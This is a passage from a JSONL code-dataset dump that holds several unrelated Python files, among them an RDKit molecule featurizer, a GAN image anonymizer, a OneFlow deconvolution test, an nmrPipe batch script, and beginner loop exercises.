variables\n\ndef example3():\n global x # this lets us read and write x variable. it makes the variable global.\n x+=1\n print(x)\n\nx = 6 # this variable is local to the entire script.\n\ndef example():\n z = 5\n print(z)\n\n#print(z) #this will cause an error because z is local to example()\n\ndef example2():\n z = 7\n print(z)\n print(x)\n\n #x+=1 # this won't work. Python can't modify the x variable this way.\n #print(x)\n\n y = x + 1 # we can read the x variable.\n print(y)\n\n return y\n\nx = example2() # we can modify x in it's scope.\nprint(x)\n\n\n \n","sub_path":"localglobalvariables.py","file_name":"localglobalvariables.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"306631259","text":"# -*- coding: utf-8 -*-\n\"\"\"\n-------------------------------------------------\n File Name: featurizing\n Description :\n Author : erikxiong\n date: 2019-06-18\n-------------------------------------------------\n Change Activity:\n 2019-06-18:\n-------------------------------------------------\n\"\"\"\n__author__ = 'erikxiong'\n\nimport os\nfrom rdkit import Chem\nfrom rdkit.Chem import MolFromSmiles\nfrom rdkit import RDConfig\nfrom rdkit.Chem import ChemicalFeatures\nimport pickle\nimport numpy as np\n\nclass Graph:\n def __init__(self, smiles, atom, bond, bond_index, label):\n self.smiles = smiles\n self.atom = atom\n self.bond = bond\n self.bond_index = bond_index\n self.label = label\n \n def __str__(self):\n return f'graph of {self.smiles}'\n \n \ndef one_of_k_encoding(x, allowable_set):\n if x not in allowable_set:\n raise Exception(\"input {0} not in allowable set{1}:\".format(\n x, allowable_set))\n return [x == s for s in allowable_set]\n\n\ndef one_of_k_encoding_unk(x, allowable_set):\n \"\"\"Maps inputs not in the allowable set to the last element.\"\"\"\n if x not in allowable_set:\n x = allowable_set[-1]\n return [x == s for s in allowable_set]\n\ndef generate_graph(smiles, label=None):\n mol = MolFromSmiles(smiles)\n if not mol:\n raise ValueError(\"Could not parse SMILES string:\", smiles)\n \n SYMBOL = ['B','C','N','O','F','Si','P','S','Cl','As','Se','Br','Te','I','At','other']\n HYBRIDIZATION = [\n Chem.rdchem.HybridizationType.SP,\n Chem.rdchem.HybridizationType.SP2,\n Chem.rdchem.HybridizationType.SP3,\n Chem.rdchem.HybridizationType.SP3D,\n Chem.rdchem.HybridizationType.SP3D2,\n 'other',\n ]\n\n\n num_atom = Chem.RemoveHs(mol).GetNumAtoms()\n\n symbol = np.zeros((num_atom, 16), np.uint8)\n hybridization = np.zeros((num_atom, 6), np.uint8)\n degree = np.zeros((num_atom, 6), np.uint8)\n num_h = np.zeros((num_atom, 5), np.uint8) \n chirality = np.zeros((num_atom, 3), np.uint8)\n aromatic = np.zeros((num_atom, 1), np.uint8)\n formal_charge = np.zeros((num_atom, 1), np.float32)\n radical_electrons = np.zeros((num_atom, 1), np.float32)\n\n for i in range(num_atom):\n atom = mol.GetAtomWithIdx(i)\n symbol[i] = one_of_k_encoding_unk(atom.GetSymbol(), SYMBOL)\n hybridization[i] = one_of_k_encoding_unk(atom.GetHybridization(), HYBRIDIZATION)\n degree[i] = one_of_k_encoding_unk(atom.GetDegree(), [0, 1, 2, 3, 4, 5])\n num_h[i] = one_of_k_encoding_unk(atom.GetTotalNumHs(includeNeighbors=True), [0, 1, 2, 3, 4])\n try:\n chirality[i] = one_of_k_encoding_unk(atom.GetProp('_CIPCode'), ['R', 'S', 'unknown'])\n except:\n chirality[i] = [0, 0, 0]\n aromatic[i] = atom.GetIsAromatic()\n formal_charge[i] = atom.GetFormalCharge()\n radical_electrons[i] = atom.GetNumRadicalElectrons()\n \n \n \n# abundant features\n# won't bring substantial change to predictive performance, sometimes even worse \n \n AtomicWeight = np.zeros((num_atom, 1), np.float32)\n AtomicNumber = np.zeros((num_atom, 1), np.float32)\n Rvdw = np.zeros((num_atom, 1), np.float32)\n RCovalent = np.zeros((num_atom, 1), np.float32)\n DefaultValence = np.zeros((num_atom, 1), np.float32)\n valence = np.zeros((num_atom, 1), np.float32)\n NOuterElecs = np.zeros((num_atom, 1), np.float32)\n ring = np.zeros((num_atom, 7), np.uint8)\n acceptor = np.zeros((num_atom, 1), np.uint8)\n donor = np.zeros((num_atom, 1), np.uint8)\n\n for i in range(num_atom):\n atom = mol.GetAtomWithIdx(i)\n AtomicNum = atom.GetAtomicNum()\n AtomicNumber[i] = AtomicNum\n AtomicWeight[i] = Chem.GetPeriodicTable().GetAtomicWeight(AtomicNum)\n Rvdw[i] = Chem.GetPeriodicTable().GetRvdw(AtomicNum) # (van der Waals radius)\n RCovalent[i] = Chem.GetPeriodicTable().GetRcovalent(AtomicNum) #(covalent radius)\n DefaultValence[i] = Chem.GetPeriodicTable().GetDefaultValence(AtomicNum) \n valence[i] = atom.GetExplicitValence()\n NOuterElecs[i] = Chem.GetPeriodicTable().GetNOuterElecs(AtomicNum)\n ring[i] = [int(atom.IsInRing()), int(atom.IsInRingSize(3)), \\\n int(atom.IsInRingSize(4)), int(atom.IsInRingSize(5)), \\\n int(atom.IsInRingSize(6)), int(atom.IsInRingSize(7)), int(atom.IsInRingSize(8))]\n \n\n factory = ChemicalFeatures.BuildFeatureFactory(os.path.join(RDConfig.RDDataDir, 'BaseFeatures.fdef'))\n feature = factory.GetFeaturesForMol(mol)\n for t in range(0, len(feature)):\n if feature[t].GetFamily() == 'Donor':\n for i in feature[t].GetAtomIds():\n donor[i] = 1\n elif feature[t].GetFamily() == 'Acceptor':\n for i in feature[t].GetAtomIds():\n acceptor[i] = 1\n \n\n num_bond = mol.GetNumBonds()\n if num_bond == 0:\n num_bond = 1 # except error caused by CH4, NH3\n bond_feat = np.zeros((num_bond*2, 10), np.int16)\n bond_index = np.zeros((num_bond*2, 2), np.int16)\n\n BOND_TYPE = [\n Chem.rdchem.BondType.SINGLE,\n Chem.rdchem.BondType.DOUBLE,\n Chem.rdchem.BondType.TRIPLE,\n Chem.rdchem.BondType.AROMATIC,\n ]\n\n BOND_STEREO = [\"STEREONONE\", \"STEREOANY\", \"STEREOZ\", \"STEREOE\"]\n ij = 0\n for i in range(num_atom):\n for j in range(num_atom):\n if i == j: continue\n bond = mol.GetBondBetweenAtoms(i, j)\n if bond is not None:\n atom1 = mol.GetAtomWithIdx(i)\n atom2 = mol.GetAtomWithIdx(j)\n bond_index[ij] = [i, j]\n bond_type = one_of_k_encoding(bond.GetBondType(), BOND_TYPE) \n bond_ring = [bond.GetIsConjugated(), bond.IsInRing()]\n bond_stereo = one_of_k_encoding(str(bond.GetStereo()), BOND_STEREO)\n bond_feat[ij] = bond_type + bond_ring + bond_stereo \n ij += 1\n\n graph = Graph(\n smiles,\n [symbol, hybridization, degree, num_h, chirality, aromatic, formal_charge, radical_electrons, \\\n AtomicWeight, AtomicNumber, Rvdw, RCovalent, DefaultValence, valence, NOuterElecs, ring, acceptor, donor],\n bond_feat,\n bond_index,\n np.array(label).reshape((1, 1)),\n )\n\n return graph\n \n \ndef graph_dict(smiles_list, label_list, filename):\n\n try:\n graph_dict = pickle.load(open(filename+'_abundant.pkl',\"rb\"))\n print('graph dicts loaded from '+ filename+'_abundant.pkl')\n \n except:\n graph_dict = {}\n for i, smiles in enumerate(smiles_list): \n graph_dict[smiles] = generate_graph(smiles, label_list[i])\n\n pickle.dump(graph_dict,open(filename+'_abundant.pkl',\"wb\"))\n print('graph dicts saved as '+ filename+'_abundant.pkl')\n\n return graph_dict\n\nif __name__ == '__main__':\n\n smiles_list = ['C1=CC=CC=C1', 'CNC', 'N', 'C', ]\n label_list = [2.,3.,4.,4.34]\n graph_dict = graph_dict(smiles_list, label_list, 'test')\n print(graph_dict['N'].atom)\n print(graph_dict['N'].bond)\n print(graph_dict['N'].bond_index)\n print(graph_dict['N'].label)\n print('load done.')\n","sub_path":"code/AttentiveFP/featurizing_abundant.py","file_name":"featurizing_abundant.py","file_ext":"py","file_size_in_byte":7292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"565582740","text":"import cv2\nimport numpy as np\nimport os\nimport pickle\nimport PIL\nimport time\nimport torch\nimport torchvision\n\nfrom PIL import Image\nfrom torchvision import transforms\n\nfrom .semantic_segmenter import SemanticSegmenter\nfrom .mask_creater import MaskCreater\nfrom .inpainter import ImageInpainter\nfrom .utils import Debugger, label_img_to_color\n\n\nclass GANonymizer:\n def __init__(self, opt):\n for k, v in opt.__dict__.items():\n setattr(self, k, v)\n self.debugger = Debugger(\n opt.mode,\n save_dir = opt.inter_log if opt.mode == 'save' else None\n )\n\n print('[INFO] Loading modules')\n self.ss = SemanticSegmenter(opt)\n self.mc = MaskCreater(opt, self.debugger)\n self.ii = ImageInpainter(opt, self.debugger)\n\n self.to_tensor = transforms.ToTensor()\n self.to_pil = transforms.ToPILImage()\n\n def __call__(self, pil_img):\n \"\"\"\n Args:\n pil_img : input image (PIL.Image)\n\n Returns:\n output image (PIL.Image)\n \"\"\"\n start_time = time.time()\n # resize and convert to torch.Tensor\n img, base_size = self.preprocess(pil_img)\n\n # semantic segmentation for detecting dynamic objects and creating mask\n label_map = self.detect(img)\n\n # get object mask\n mask, max_obj_size = self.create_mask(img, label_map)\n\n # image and edge inpainting\n inpainted = self.inpaint(img, mask, max_obj_size)\n\n # resize and convert to PIL\n output = self.postprocess(inpainted, base_size)\n\n print('[INFO] whole elapsed time :', time.time() - start_time)\n return self.to_pil(img), output\n\n def preprocess(self, img):\n print('===== Preprocess =====')\n print('[INFO] original image size :', img.size)\n start = time.time()\n if self.resize_factor is None:\n print('[INFO] elapsed time :', time.time() - start)\n return self.to_tensor(img), img.size\n new_w = int(img.size[0] * self.resize_factor)\n new_h = int(img.size[1] * self.resize_factor)\n new_w -= new_w % 4\n new_h -= new_h % 4\n img = img.resize((new_w, new_h))\n print('[INFO] resized image size :', (new_w, new_h))\n print('[INFO] elapsed time :', time.time() - start)\n return self.to_tensor(img), (new_w, new_h)\n\n def detect(self, img):\n # semantic segmentation\n print('===== Semantic Segmentation =====')\n start = time.time()\n label_map = self.ss(img)\n vis, lc_img = label_img_to_color(label_map)\n self.debugger.imsave(vis, 'color_semseg_map.png')\n self.debugger.imsave(lc_img, 'label_color_map.png')\n print('[INFO] elapsed time :', time.time() - start)\n return label_map\n\n def create_mask(self, img, label_map):\n # create mask image and image with mask\n print('===== Creating Mask Image =====')\n start = time.time()\n mask, max_obj_size = self.mc(label_map) # shape=(h, w) # dtype=torch.float32\n print('[INFO] max_obj_size :', max_obj_size)\n # visualize the mask overlayed image\n mask3c = torch.stack([mask, torch.zeros_like(mask), torch.zeros_like(mask)], dim=0) \n self.debugger.matrix(mask3c, 'mask3c')\n self.debugger.matrix(img, 'img')\n overlay = img*0.8 + mask3c*0.2\n self.debugger.imsave(mask, 'final_mask.png')\n self.debugger.imsave(overlay, 'img_with_mask.png')\n print('[INFO] elapsed time :', time.time() - start)\n return mask, max_obj_size\n\n def inpaint(self, img: torch.Tensor, mask: torch.Tensor, max_obj_size: float):\n # inpainter\n print('===== Image Inpainting =====')\n start = time.time()\n inpainted, inpainted_edge, edge = self.ii(img, mask, max_obj_size)\n self.debugger.imsave(edge, 'edge.png')\n self.debugger.imsave(inpainted_edge, 'inpainted_edge.png')\n print('[INFO] elapsed time :', time.time() - start)\n return inpainted\n\n def postprocess(self, img: torch.Tensor, size: tuple) -> torch.Tensor:\n print('===== Postprocess =====')\n start = time.time()\n out = self.to_pil(img)\n out = out.resize(size)\n print('[INFO] elapsed time :', time.time() - start)\n return out","sub_path":"app/api/gano/modules/ganonymizer.py","file_name":"ganonymizer.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"92609737","text":"import asyncio\nimport curses\nimport random\n\nfrom tools.sleep import sleep\n\n\ndef get_stars(canvas, num):\n ''' Получить необходимое количество звезд-корутин.\n \n :param canvas: объект холста\n :type canvas: canvss\n :param num: количество звезд\n :type num: int\n '''\n stars = [get_random_star(canvas) for _ in range(num)]\n return stars\n\n\ndef get_random_star(canvas):\n ''' Создать корутину, рисующую звезду.\n\n :param canvas: объект холста\n :type canvas: canvas\n '''\n offset_tics = random.randint(1, 40)\n y_max, x_max = canvas.getmaxyx()\n column = random.randint(1, x_max - 2)\n row = random.randint(1, y_max - 2)\n star = blink(canvas, offset_tics, column, row)\n return star\n\n\nasync def blink(canvas, offset_tics, column, row):\n ''' Анимация звезды. \n \n У звезды 4 фазы. Для того, чтобы они мигали асинхронно, первая фаза случайна.\n \n :param canvas: объект холста\n :type canvas: canvas\n :param offset_tics: время действия первой фазы\n :type offset_tics: int\n :param column: координата на холсте\n :type column: int\n :param row: координата на холсте\n :type row: int\n '''\n symbols = ['*', ':', '=', '+', '-']\n symbol = random.choice(symbols)\n while True:\n canvas.addstr(row, column, symbol, curses.A_DIM)\n await sleep(offset_tics)\n\n canvas.addstr(row, column, symbol)\n await sleep(3)\n\n canvas.addstr(row, column, symbol, curses.A_BOLD)\n await sleep(5)\n\n canvas.addstr(row, column, symbol)\n await sleep(3)\n","sub_path":"space_cleaner/space_objects/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"244856146","text":"#!/usr/bin/env python\n#\n# License: BSD\n# https://raw.githubusercontent.com/stonier/py_trees/devel/LICENSE\n#\n##############################################################################\n# Documentation\n##############################################################################\n\n\"\"\"\nMocks the move base action server of the ROS navigation stack.\n\"\"\"\n\n##############################################################################\n# Imports\n##############################################################################\n\nimport dynamic_reconfigure.server\nimport rospy\n\nfrom py_trees_msgs.cfg import MockSafetySensorsConfig\n\n##############################################################################\n# Classes\n##############################################################################\n\n\nclass SafetySensors(object):\n \"\"\"\n Mocks the ability to enable/disable a safety sensor processing pipeline.\n This emulates a component which needs to be enabled contextually so that\n cpu resources can be efficiently optimised or to resolve contextual\n conflicts in the usage of the sensors.\n\n Dynamic Reconfigure:\n * **~enable** (:obj:`bool`)\n\n * enable/disable the safety sensor pipeline\n \"\"\"\n def __init__(self):\n # dynamic reconfigure\n self.parameters = None\n # note this instantiation will automatically trigger the callback, so\n # self.parameters *will* get initialised\n self.dynamic_reconfigure_server = dynamic_reconfigure.server.Server(\n MockSafetySensorsConfig,\n self.dynamic_reconfigure_callback\n )\n\n def dynamic_reconfigure_callback(self, config, unused_level):\n \"\"\"\n Args:\n config (:obj:`dynamic_reconfigure.encoding.Config`): incoming configuration\n level (:obj:`int`):\n \"\"\"\n self.parameters = config\n return config\n","sub_path":"py_trees_ros/mock/safety_sensors.py","file_name":"safety_sensors.py","file_ext":"py","file_size_in_byte":1892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"26156774","text":"\"\"\"\nCopyright 2020 The OneFlow Authors. All rights reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\nimport os\nfrom collections import OrderedDict\n\nimport numpy as np\nimport oneflow as flow\nimport tensorflow as tf\nimport test_global_storage\nfrom test_util import GenArgList\n\n\ndef compare_with_tensorflow(device_type, params_case, dilations, data_format):\n input_shape, output_shape, padding, strides, kernel_size = params_case\n assert data_format in [\"NCHW\", \"NHWC\"]\n out_channels = output_shape[1] if data_format == \"NCHW\" else output_shape[3]\n in_channels = input_shape[1] if data_format == \"NCHW\" else input_shape[3]\n assert device_type in [\"gpu\"]\n\n flow.clear_default_session()\n func_config = flow.FunctionConfig()\n func_config.default_data_type(flow.float)\n\n @flow.global_function(type=\"train\", function_config=func_config)\n def DeconvJob():\n with flow.scope.placement(device_type, \"0:0\"):\n x = flow.get_variable(\n \"x\",\n shape=input_shape,\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n if data_format == \"NCHW\":\n weight = flow.get_variable(\n \"weight\",\n shape=(in_channels, out_channels, kernel_size, kernel_size),\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n else:\n weight = flow.get_variable(\n \"weight\",\n shape=(in_channels, kernel_size, kernel_size, out_channels),\n dtype=flow.float,\n initializer=flow.random_uniform_initializer(minval=-10, maxval=10),\n trainable=True,\n )\n loss = flow.nn.conv2d_transpose(\n x,\n weight,\n strides=strides,\n output_shape=output_shape,\n dilations=dilations,\n padding=padding,\n data_format=data_format,\n )\n flow.optimizer.SGD(\n flow.optimizer.PiecewiseConstantScheduler([], [1e-4]), momentum=0\n ).minimize(loss)\n\n flow.watch(x, test_global_storage.Setter(\"x\"))\n flow.watch_diff(x, test_global_storage.Setter(\"x_diff\"))\n flow.watch(weight, test_global_storage.Setter(\"weight\"))\n flow.watch_diff(weight, test_global_storage.Setter(\"weight_diff\"))\n flow.watch(loss, test_global_storage.Setter(\"loss\"))\n flow.watch_diff(loss, test_global_storage.Setter(\"loss_diff\"))\n\n return loss\n\n # OneFlow\n check_point = flow.train.CheckPoint()\n check_point.init()\n of_out = DeconvJob().get()\n # Tensorflow\n if data_format == \"NCHW\":\n with tf.GradientTape(persistent=True) as tape:\n x = tf.Variable(test_global_storage.Get(\"x\").transpose(0, 2, 3, 1))\n output_shape = (\n output_shape[0],\n output_shape[2],\n output_shape[3],\n output_shape[1],\n )\n w = tf.Variable(test_global_storage.Get(\"weight\").transpose(2, 3, 1, 0))\n tf_out = tf.nn.conv2d_transpose(\n x,\n w,\n output_shape=output_shape,\n strides=[1, strides, strides, 1],\n padding=padding,\n data_format=\"NHWC\",\n )\n\n loss_diff = test_global_storage.Get(\"loss_diff\").transpose(0, 2, 3, 1)\n tf_x_diff = tape.gradient(tf_out, x, loss_diff)\n tf_weight_diff = tape.gradient(tf_out, w, loss_diff)\n\n assert np.allclose(\n of_out.numpy().transpose(0, 2, 3, 1), tf_out.numpy(), rtol=1e-02, atol=1e-02\n )\n assert np.allclose(\n test_global_storage.Get(\"x_diff\").transpose(0, 2, 3, 1),\n tf_x_diff.numpy(),\n rtol=1e-4,\n atol=1e-4,\n )\n assert np.allclose(\n test_global_storage.Get(\"weight_diff\").transpose(2, 3, 1, 0),\n tf_weight_diff.numpy(),\n rtol=1e-4,\n atol=1e-4,\n )\n else:\n with tf.GradientTape(persistent=True) as tape:\n x = tf.Variable(test_global_storage.Get(\"x\"))\n w = tf.Variable(test_global_storage.Get(\"weight\").transpose(1, 2, 3, 0))\n tf_out = tf.nn.conv2d_transpose(\n x,\n w,\n output_shape=output_shape,\n strides=[1, strides, strides, 1],\n padding=padding,\n data_format=\"NHWC\",\n )\n loss_diff = test_global_storage.Get(\"loss_diff\")\n tf_x_diff = tape.gradient(tf_out, x, loss_diff)\n tf_weight_diff = tape.gradient(tf_out, w, loss_diff)\n\n assert np.allclose(of_out.numpy(), tf_out.numpy(), rtol=1e-02, atol=1e-02), (\n of_out.numpy() - tf_out.numpy()\n )\n assert np.allclose(\n test_global_storage.Get(\"x_diff\"), tf_x_diff.numpy(), rtol=1e-02, atol=1e-02\n )\n assert np.allclose(\n test_global_storage.Get(\"weight_diff\").transpose(1, 2, 3, 0),\n tf_weight_diff.numpy(),\n rtol=1e-2,\n atol=1e-2,\n )\n\n\ndef test_deconv2d_NHWC_1n1c(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device_type\"] = [\"gpu\"]\n # params_case: (input_shape, output_shape, padding, stirdes, kernel_size)\n arg_dict[\"params_case\"] = [\n ((32, 3, 3, 4), (32, 3, 3, 8), \"SAME\", 1, 3),\n ((32, 3, 3, 2), (32, 6, 6, 8), \"SAME\", 2, 4),\n ((32, 2, 2, 1), (32, 5, 5, 2), \"VALID\", 2, 2),\n ((32, 2, 2, 16), (32, 8, 8, 4), \"VALID\", 2, 5),\n ]\n arg_dict[\"dilations\"] = [1]\n arg_dict[\"data_format\"] = [\"NHWC\"]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow(*arg)\n\n\ndef test_deconv2d_NCHW_1n1c(test_case):\n arg_dict = OrderedDict()\n arg_dict[\"device_type\"] = [\"gpu\"]\n # params_case: (input_shape, output_shape, padding, stirdes, kernel_size)\n arg_dict[\"params_case\"] = [\n ((32, 4, 3, 3), (32, 8, 3, 3), \"SAME\", 1, 3),\n ((32, 4, 3, 3), (32, 8, 6, 6), \"SAME\", 2, 5),\n ((32, 1, 2, 2), (32, 2, 5, 5), \"VALID\", 2, 2),\n ((32, 16, 2, 2), (32, 4, 8, 8), \"VALID\", 2, 5),\n ]\n arg_dict[\"dilations\"] = [1]\n arg_dict[\"data_format\"] = [\"NCHW\"]\n for arg in GenArgList(arg_dict):\n compare_with_tensorflow(*arg)\n","sub_path":"oneflow/python/test/ops/test_deconv2d.py","file_name":"test_deconv2d.py","file_ext":"py","file_size_in_byte":7074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"378474505","text":"# @Time : 2019-04-03 22:04:59\n# @Author : lemon_xiuyu\n# @Email : 5942527@qq.com\n# @File : contants.py\n# @function : 数据路径\n\n\n# from common.do_excel import DoExcel\n# do_excel = DoExcel(\"..//datas//cases.xlsx\")\n# 上面在字母好用,在python13-api-test下报错,\n# 这是相对路径,老师不建议,要用绝对路径\n\n# 定义一个常量封装: 常量:文件夹路径。变量:\n# 指定路径 封装常量路径\nimport os\n\"\"\"\n# 小简老师:课堂内容\nbase_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\ndata_dir = os.path.join(base_dir, \"datas\")\ncase_file = os.path.join(data_dir, \"cases.xlsx\")\n\n\"\"\"\n# 结合两位老师最简方式\n# 读取测试用例文件的路径\nbase_dir = os.path.dirname(os.getcwd()) # 根目录\ndata_dir = os.path.join(base_dir, \"datas\") # datas目录\ncase_file = os.path.join(data_dir, \"cases.xlsx\") # cases.xlsx表格路径\n\n# 获取配置文件-拼接uirl的路径\nconf_dir = os.path.join(base_dir, \"conf\") # conf路径\ntest_conf = os.path.join(conf_dir, \"test.conf\") # 第一套 配置文件 路径\ntest2_conf = os.path.join(conf_dir, \"test2.conf\") # 第二套 配置文件 路径\ntest3_conf = os.path.join(conf_dir, \"test3.conf\") # 第三套 配置文件 路径(自己本地环境)\nglobal_conf= os.path.join(conf_dir, \"global.conf\") # 总开关 配置文件 路径\n\nprint(case_file)\nprint(test_conf)\n# F:\\Wenjian\\Python_Pycharm\\python13-api-test\\conf\\test.conf","sub_path":"课堂笔记/class_0123_配置文件/common/contants.py","file_name":"contants.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"590406126","text":"#!/usr/bin/python\n\n# Requires an fid_*.com and ft_*.com template file in the folder \"template\"\n# AND\n# Requires a path_*.txt giving the path to the raw data\n# will run template/fid.com for each folder in the raw data directory\n\n\nimport os\nimport glob\nimport shutil\nimport re\n\n\n# Get directory listing, not including certain directories\nraw_path_filename = glob.glob('path_*.txt')[0]\nwith open(raw_path_filename, 'r') as raw_data_path:\n raw_data = raw_data_path.read()\npath_orig = os.getcwd()\nos.chdir(raw_data)\ndirList = os.listdir(os.getcwd())\ndirList = [f for f in dirList if os.path.isdir(f) and f not in ['fid','ft','proc_file','template']]\nos.chdir(path_orig)\n\n# Delete directories if they exist\nif os.path.exists('fid'):\n shutil.rmtree('fid')\nif os.path.exists('ft'):\n shutil.rmtree('ft')\nif os.path.exists('proc_file'):\n shutil.rmtree('proc_file')\nos.mkdir('ft')\nos.mkdir('fid')\nos.mkdir('proc_file')\n\n# excecute fid.com for all dirs\nos.chdir('template')\nfor f in dirList:\n exit_status = os.system(\"fid_*.com \" + f)\n if exit_status:\n quit()\nos.chdir('..')\nfidList=os.listdir('fid')\nfidList=[ os.path.splitext(f)[0] for f in fidList] #remove extension\n\n# excecute ft.com for all dirs\nos.chdir('template')\nfor f in fidList:\n exit_status = os.system(\"ft_*.com \" + f)\n if exit_status:\n quit()\nos.chdir('..')\n#read in the template ft script\n#replace in and out with each file's name\nft_name = glob.glob(\"template/ft_*.com\")[0]\nwith open(ft_name,'r') as fid:\n txt = fid.read()\n\nfor f in fidList:\n new_txt = re.sub('\\$1', f, txt)\n with open('./proc_file/' + 'ft_'+f+'.com','w') as fid:\n fid.writelines(new_txt)\n\nos.system('chmod +x ./proc_file/*')\n \n\n","sub_path":"nmrPipe_macros/batch_nmrPipe_v_2_python.py","file_name":"batch_nmrPipe_v_2_python.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"61352358","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport math\n\na=np.arange(0,200,0.001)\nb=np.sin(a);\n# ax=plt.subplots(2,2)\nplt.figure()\nplt.plot(a,b,'g')\nplt.plot(a[a>np.pi],b[a>np.pi],'r')\nplt.xlim(0,2*np.pi)\nplt.xlabel(\"x\")\nplt.ylabel(\"y\")\nplt.show()\nx=np.array([[0,4],\n [2,3] ])\nprint(np.linalg.norm(x,axis=0))\nprint(math.sqrt(pow(3,2)+pow(4,2)+pow(4,2)+pow(6,2)+pow(1,2)))\nhelp(np.random)\n","sub_path":"py/plt_test.py","file_name":"plt_test.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"352939787","text":"\n\nfrom xai.brain.wordbase.verbs._sully import _SULLY\n\n#calss header\nclass _SULLIED(_SULLY, ):\n\tdef __init__(self,): \n\t\t_SULLY.__init__(self)\n\t\tself.name = \"SULLIED\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"sully\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_sullied.py","file_name":"_sullied.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"562960220","text":"# if\nfrom datetime import datetime\nhour = datetime.now().hour\nif hour < 12:\n print('오전입니다')\nnumbers = [1,2,3,4,5]\nif 5 in numbers:\n print(\"5가 있다\")\n\n# while\ni, j, count = 1, 1, 5\nwhile i < count:\n while j <= i:\n print('*', end='')\n j += 1\n print()\n j = 1\n i += 1\n\n# for\nfor i in range(7):\n print(i)\nfor i in range(1,7,2):\n print(i) \nfor i in range(1,6):\n for j in range(i):\n print('*', end='')\n print()\nfor s in ['adc', 'de', 'fgh']:\n print(s)\np = ['가위', '바위', '보']\nfor i in p:\n print(i)\nstr = ['a', 'bc', 'def', 'ghij']\nfor i, s in enumerate(str):\n print('{}번 : {}'.format(i + 1, s))\nfor s2 in \"abcdefgh\":\n print(s2)\n\n# 예제 1\nn = int(input('숫자를 입력하세요 : '))\nfor i in range(1, n + 1):\n print('2 to the ' + str(i) + ' power is ' + str(2**i))\n\n# 과제 1\nn = int(input('숫자를 입력하세요 : '))\ni = 0\nwhile i < 10:\n print('2 to the ' + str(i) + ' power is ' + str(2**i))\n i += 1\n\n# 예제 2\nsentence = input('문자열 입력 : ')\ncount = 0\nfor c in sentence:\n if c in 'aeiou':\n count += 1\nprint('There are ' + str(count) + ' vowels in that sentence.')\n\n# 과제 2\nfor i in range(1, 10):\n for j in range(2, 10):\n print(\"{0:2d} * {1:2d} = {2:2d}\".format(j, i, i*j), end='')\n print()","sub_path":"Python/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"171360708","text":"import math\nimport time\n\ndef extract_mag_and_phase(vector):\n \"\"\"\n Return the phase and magnitude of the \n frame vector [dx,dy]\n \"\"\"\n vector = list(vector)\n scaling_factor = math.sqrt(vector[0]**2 + vector[1]**2)\n mag = math.sqrt(vector[0]**2+vector[1]**2)\n vector[0] = vector[0] * (1./scaling_factor)\n vector[1] = vector[1] * (1./scaling_factor)\n phase = degrees(math.copysign(math.atan(vector[1]/vector[0]), vector[1]) + math.pi)\n return [mag, phase]\n\ndef get_note(phase):\n \"\"\"\n Figure out what range the phase is in\n \"\"\"\n correct = 1\n\n #note_phases = {'G':[90,112],'C':[112,134],'E':[134,156],'A':[156,178],'D':[178,200]}\n note_phases = {0:[90,112],1:[112,134],2:[134,156],3:[156,178],4:[178,200]}\n#69 71 72 76 84\n for note, p_range in note_phases.iteritems():\n if phase%360 < p_range[1] and phase%360 >= p_range[0]:\n correct = note\n return correct\n\ndef degrees(phase):\n if phase<0:\n phase = 2*math.pi+phase\n return phase/math.pi*180\n\ndef get_volume(mag,threshold,c):\n \"\"\"\n Some constant times the magnitude = volume \n unless magnitude is below a threshold\n \"\"\"\n if mag > threshold:\n return c*mag\n else:\n return 0\n\ndef note_delay(prev_time, prev_note, cur_note, tmax=1):\n \"\"\"\n If the note for this frame is the same as the last, \n don't do anything until tmax seconds have passed\n or another note is played\n \"\"\"\n while prev_note == cur_note:\n time_delta = time.time() - prev_time ## old time being the last time that note was played\n if time_delta >= tmax: #seconds\n ## play the note again\n prev_time = time.time()\n prev_note = cur_note\n else:\n ## be silent\n pass\n","sub_path":"map_cvdata.py","file_name":"map_cvdata.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"491927816","text":"'''heyingge_Find_the_Number.py\nby Freddie He\n\nAssignment 2, in CSE 415, Winter 2018.\n\nThis file contains my problem formulation for the problem 